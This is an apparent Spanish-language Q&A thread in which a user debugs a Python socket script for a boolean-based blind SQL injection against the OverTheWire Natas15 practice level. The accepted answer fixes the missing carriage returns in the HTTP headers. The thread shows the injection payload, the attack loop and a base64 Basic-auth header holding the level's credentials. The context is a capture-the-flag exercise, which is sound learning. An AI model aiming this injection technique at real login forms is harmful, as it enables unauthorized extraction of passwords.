# Python modulo 'Socket' me devuelve 400 Bad Request

Tags: python, socket

Estoy intentando hacer un reto de un CTF, para completarlo tengo que realizar un ataque de SQL Injection. Quise automatizar el ataque y "cree" un script de Python para enviar peticiones HTTP con el modulo `socket`. Sin embargo, al hacer una primer prueba de si se mandan los paquetes, me di cuenta que al intentar enviarlo el servidor me responde con un error `400 Bad Request`. Investigue bastante e incluso prove con todas las cabeceras que se envían en una petición real (Las cabeceras que se enviaban las saque de una petición real capturada con BurpSuite), sin embargo, ni con todas las cabeceras de una petición real me funciono.

Script:

```
#!/bin/python3
import socket


HOST = "natas15.natas.labs.overthewire.org"
PORT = 80

HEADERS = """POST /index.php HTTP/1.1
Host: natas15.natas.labs.overthewire.org
Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==
Content-Type: application/x-www-form-urlencoded
Content-Length: {content_lenght}\r\n\r\n"""

# guessed: Representa la contraseña obtenida hasta el momento. 
POST = 'username=natas16" AND LEFT(password, {guessed_length})="{guessed}'


def boolean_based_SQLI_attack(guessed_password):
    sock = socket.socket(family = socket.AF_INET, type = socket.SOCK_STREAM)
    sock.connect((HOST, PORT))

    FINAL_POST = POST.format(guessed_length = len(guessed_password), guessed = guessed_password)
    FINAL_HEADERS = HEADERS.format(content_lenght = len(POST))
    
    request = FINAL_HEADERS + FINAL_POST 
    print(request, '\n')    
    sock.send(bytes(request, 'UTF-8')) 

    response = str(sock.recv(8192), 'UTF-8')
    print(response)

    sock.close()

    if "This user exists." in response:
        return True
    else:
        return False


print(boolean_based_SQLI_attack('W'))
```

Finalmente, la petición queda así:

```
POST /index.php HTTP/1.1
Host: natas15.natas.labs.overthewire.org
Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

username=natas16" AND LEFT(password, 1)="W
```

El error:

```
HTTP/1.1 400 Bad Request
Date: Mon, 11 Jul 2022 23:53:52 GMT
Server: Apache/2.4.10 (Debian)
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at natas.labs.overthewire.org Port 80</address>
</body></html>
```

Tambien probe enviando diferente información en la petición POST pero no funciono.

Answer (score 1, accepted):

Buen día,

El problema es el formato que tienen tus `HEADERS`, cuando los declaras de esta forma:

```
HEADERS = """POST /index.php HTTP/1.1
Host: natas15.natas.labs.overthewire.org
Authorization: Basic <censurado>
Content-Type: application/x-www-form-urlencoded
Content-Length: {content_lenght}\r\n\r\n"""
```

Cada cambio de línea se crea únicamente con una nueva línea `\n` (Line feed, `LF`) pero necesitas también agregar el retorno de carro `\r` (Carriage return, `CR`) por lo que hay que agregarle `\r` a cada línea de la siguiente forma:

```
HEADERS = """POST /index.php HTTP/1.1\r
Host: natas15.natas.labs.overthewire.org\r
Authorization: Basic <censurado>\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: {content_lenght}\r\n\r\n"""
```

Corrigiendo eso el código recibe `401` como respuesta:

```
POST /index.php HTTP/1.1
Host: natas15.natas.labs.overthewire.org
Authorization: Basic <censurado>
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

username=natas16" AND LEFT(password, 1)="W 

HTTP/1.1 401 Unauthorized
Date: Tue, 12 Jul 2022 00:36:34 GMT
Server: Apache/2.4.10 (Debian)
WWW-Authenticate: Basic realm="Authentication required"
Content-Length: 481
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at natas15.natas.labs.overthewire.org Port 80</address>
</body></html>

False
```

**Nota:** Me parece que tu línea de `POST` también tiene algunos errores, por ejemplo tienes comillas `"` al final del usuario y al inicio de la contraseña. Te recomiendo revisar esa línea también.

Comment: Hola HeytalePazguato! Muchas gracias por tu ayuda, pude solucionar el error.
Respondiendo a tu aporte: El server responde con un `401 Unauthorized` debido a que se requieren credenciales de sesión. Mejor las agrego para no causar confusion, saludos!

Comment: No hay de que, saludos!